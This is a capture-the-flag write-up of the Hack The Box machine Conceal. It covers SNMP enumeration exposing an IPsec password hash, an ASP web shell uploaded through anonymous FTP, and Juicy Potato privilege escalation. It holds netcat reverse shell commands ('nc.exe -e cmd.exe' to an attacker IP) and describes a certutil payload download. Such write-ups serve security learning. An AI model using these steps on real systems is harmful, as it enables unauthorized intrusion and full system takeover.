# Hack The Box - Conceal

## Quick Summary

Hey guys today Conceal retired and here’s my write-up about it. Conceal was a straightforward fun box, The only tricky part about it is gaining IPSEC connection to gain access to some filtered services. That first part involved some guessing but after that everything is simple and very straightforward. I liked this machine and it was a very fun one. It’s a windows machine and its ip is 10.10.10.116, I added it to /etc/hosts as conceal.htb. Let’s jump right in.

## Nmap

As always we will start with nmap to scan for open ports and services.
nmap -sV -sT -sC conceal.htb

And we got nothing !
I ran another nmap UDP scan on all ports :
nmap -vvv -sU -o nmapudp conceal.htb --max-retries 0
The output was too long so I will show the only important part :

It was not sure about port 161, but it showed that port 500 is open.
I ran a third scan on ports 500 and 161 :
nmap -p 161,500 -sV -sU -sC conceal.htb

Full Output :

We have two services to enumerate. isakmp which is IPSEC and snmp.

## Snmp Enumeration

I started with snmpwalk :
snmpwalk -c public -v 1 conceal.htb
The output was very long but we only need this first part :

We have a password hash for the IPSEC connection : 9C8B1A372B1878851BE2C097031B6E43
I used crackstation to crack it and I got this result :

Great ! Now we need to enumerate the ike vpn service to know how to connect to it.

## ike-scan, Setting up The Connection

I ran ike-scan and got these results :

I installed strongswan to set up the IPSEC connection. With the help of the info I got from ike-scan and some guessing I could come up with this configuration which worked :
/etc/ipsec.conf :

/etc/ipsec.secrets :

I started ipsec then I initialized the connection :
ipsec start
ipsec up rick-to-conceal

It worked fine, now we are connected to a vpn network let’s see what new services can we get.

## Nmap (Second Time)

nmap -sV -sT -sC conceal.htb

We got ftp on port 21 , http on port 80 and smb on port 445. I wanted to check ftp first and see if I can authenticate anonymously.

## FTP, File Upload, Reverse Shell and User Flag

It worked but there was literally nothing on that ftp server. I uploaded a test file to check if I have write permissions on that ftp server and I had.

I Checked the http service and there was only the default IIS page :

I ran gobuster with /usr/share/wordlists/dirb/common.txt and got only one directory called /upload :

I went to /upload and found my test file :

Great ! I uploaded an asp shell to get remote code execution :

shell.asp :

I got a powershell reverse shell :

We got user.

## SeImpersonatePrivilege, Juicy Potato, Privilege Escalation and Root Flag

After getting user the privilege escalation is easy and straightforward. Before doing any enumeration I checked my privileges as Destitute and I found that I had the SeImpersonatePrivilege.

This means that we can apply the famous attack Juicy Potato. You can read about it on the official github repository. We need to know the version of this windows to pick the right clsid.
systeminfo

It’s Microsoft Windows 10 Enterprise. I got the clsid of wuauserv from here which is :
{e60687f7-01a1-40aa-86ac-db1cbf673334}
I got a compiled binary of Juicy Potato from the github repository. I hosted it on a python simple http server then I downloaded it on the machine with certutil :

However I had some problems with my powershell reverse shell and it couldn’t run juicypotato.exe properly so I got another cmd shell with nc :

nc.exe -e cmd.exe 10.10.xx.xx 1339

I created a bat file that executes : nc.exe -e cmd.exe 10.10.xx.xx 1340 to get me a reverse shell :

Then I ran juicypotato.exe and made it execute that bat file :

It worked fine and we got a reverse shell as nt authority\system

And we owned root !

That’s it , Feedback is appreciated !